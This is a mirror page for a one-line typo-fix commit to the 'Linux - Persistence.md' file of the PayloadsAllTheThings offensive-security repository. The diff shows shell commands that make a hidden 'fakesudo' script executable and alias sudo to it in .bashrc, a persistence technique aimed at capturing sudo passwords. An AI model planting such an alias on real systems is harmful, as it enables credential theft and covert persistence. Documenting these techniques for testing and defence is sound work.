mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 15:14:34 +00:00
Fix typo in Linux - Persistence.md
This commit is contained in:
parent
2148c89452
commit
1fcbd576fe
1 changed files with 1 additions and 1 deletions
|
@ -72,7 +72,7 @@ or add the following line inside its .bashrc file.
|
|||
|
||||
```powershell
|
||||
$ chmod u+x ~/.hidden/fakesudo
|
||||
$ echo "alias sudo=~/.hidden/fakesudo" >> ~./bashrc
|
||||
$ echo "alias sudo=~/.hidden/fakesudo" >> ~/.bashrc
|
||||
```
|
||||
|
||||
and create the `fakesudo` script.
|
||||
|
|
Loading…
Reference in a new issue